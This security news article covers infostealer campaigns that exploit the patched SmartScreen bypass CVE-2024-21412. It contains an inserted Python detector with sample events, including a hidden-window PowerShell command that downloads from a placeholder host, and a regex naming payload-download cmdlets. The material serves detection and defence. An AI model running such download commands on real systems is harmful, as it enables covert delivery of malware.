Cyberattackers Exploit Microsoft SmartScreen Bug in Stealer Campaign

Published: 23/11/2024   Category: security




The good news: Only organizations far behind on standard Windows patching have anything to worry about.



A Microsoft Defender SmartScreen vulnerability that was patched in February is still being used in infostealing attacks across the globe.

CVE-2024-21412 — a high severity, 8.1 CVSS-scored security bypass bug in SmartScreen — was first disclosed and fixed on Feb. 13. Since then, it has been used in campaigns involving well-known infostealers like Lumma Stealer, Water Hydra, and DarkGate.

Now, five months later, Fortinet has flagged yet another campaign involving two more stealers: Meduza and ACR. Attacks thus far have reached the US, Spain, and Thailand.
"Sometimes, organizations take their time updating third-party software. By contrast, the attackers in this case are taking advantage of software that's native on Microsoft Windows, which would be updated in normal Microsoft patch cycles," notes Aamir Lakhani, global security strategist and researcher at Fortinet. "It's a little unclear and concerning when these vulnerabilities are not patched, because it could indicate there are other Microsoft vulnerabilities that are not being patched as well."

If you visit a website, or download a file or program that's known to be unsafe — or is suspicious for any number of other reasons — SmartScreen will step in and present you with that famous blue screen message: "Windows protected your PC." It's a simple, effective way to alert users to potentially dangerous cyber threats.

So consider how useful it would be to an attacker if they could simply disable that notification. This is what CVE-2024-21412 allows them to do.

In the latest campaign identified by Fortinet, the attackers are beating SmartScreen through "the combination of PowerShell trickery and hiding attacks in images and taking advantage of how those images are processed," Lakhani explains.
First, they lure victims with a URL that triggers the download of a shortcut (LNK) file. The LNK downloads an executable with an HTML Application (HTA) script with PowerShell code for retrieving decoy PDF files and malicious code injectors.
One of the injectors is more interesting than the other. After running anti-debugging checks, it downloads a JPG image file, then uses a Windows API to access its pixels and decode its bytes, wherein lies malicious code.
"These types of image-based attacks have been around a long time and, while they aren't as common as other types of attacks we typically observe, we still see them pop up over time because they are quite effective," Lakhani notes. "It's not surprising to see this attack, especially because [steganography] detection is often overlooked compared to other attack scenarios."
The stealers smuggled in through image files in this case get planted inside of legitimate Windows processes, at which point the gathering and exfiltration of data begins.
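A defender-side illustration of the launch chain described above (URL, LNK, executable carrying an HTA script, PowerShell fetching payloads), added here and not part of the Fortinet research or this article: Python that walks constructed, Sysmon-style process-creation records in a hypothetical tuple format and flags PowerShell download commands whose process ancestry includes mshta.exe, while letting an ordinary download from an interactive shell pass.

```python
import ntpath
import re

# Constructed, Sysmon-style process-creation events (hypothetical tuple format):
# (pid, ppid, image path, command line). Paths, file names and hosts are made up.
SAMPLE_EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Users\u\Downloads\invoice.exe", r'"C:\Users\u\Downloads\invoice.exe"'),
    (300, 200, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\u\AppData\Local\Temp\a.hta"),
    (400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/d.pdf -OutFile d.pdf"),
    # Benign: an admin fetching a file from a normal shell, no mshta.exe in the ancestry.
    (500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe Invoke-WebRequest http://example.invalid/tool.zip -OutFile tool.zip"),
]

# Cmdlets and aliases commonly used to retrieve payloads from a script.
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|\biwr\b", re.IGNORECASE)


def ancestors(pid, by_pid, max_depth=6):
    """Image basenames from pid outward (self first), stopping at max_depth or a missing parent."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        ppid, image, _ = by_pid[pid]
        chain.append(ntpath.basename(image).lower())
        pid = ppid
    return chain


def find_hta_powershell_chains(events):
    """Return (pid, chain) for each PowerShell download command launched under mshta.exe."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    findings = []
    for pid, (_, image, cmd) in by_pid.items():
        if ntpath.basename(image).lower() != "powershell.exe" or not DOWNLOAD_PATTERN.search(cmd):
            continue
        chain = ancestors(pid, by_pid)
        if "mshta.exe" in chain[1:]:  # an HTA host somewhere above this shell
            findings.append((pid, chain))
    return findings


if __name__ == "__main__":
    for pid, chain in find_hta_powershell_chains(SAMPLE_EVENTS):
        print(f"pid {pid}: {' <- '.join(chain)}")
```

On the constructed sample only pid 400 is reported, with the chain powershell.exe <- mshta.exe <- invoice.exe <- explorer.exe; the same walk can be pointed at real Sysmon event 1 records once they are mapped to the tuple shape.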
The kinds of information they aim for are broad. ACR, for example, steals from dozens of browsers (Google Chrome, Firefox), dozens of crypto wallets (Binance, Ledger Live), messenger apps (Telegram, WhatsApp), password managers (Bitwarden, 1Password), virtual private network (VPN) apps, email clients, file transfer protocol (FTP) clients, and more. 
Only organizations far behind on standard Windows patching have anything to worry about. Clearly, though, those organizations are out there.
"I would understand how individual software updates from smaller companies may be missed, but most organizations have regular Microsoft software patch updates, and this particular vulnerability remains open to attack," Lakhani says. To encourage better patching practices, he adds, "I think in all cases, software vendors need to give users alerts and notifications that critical security patches exist and should be installed when the software is launched or used."
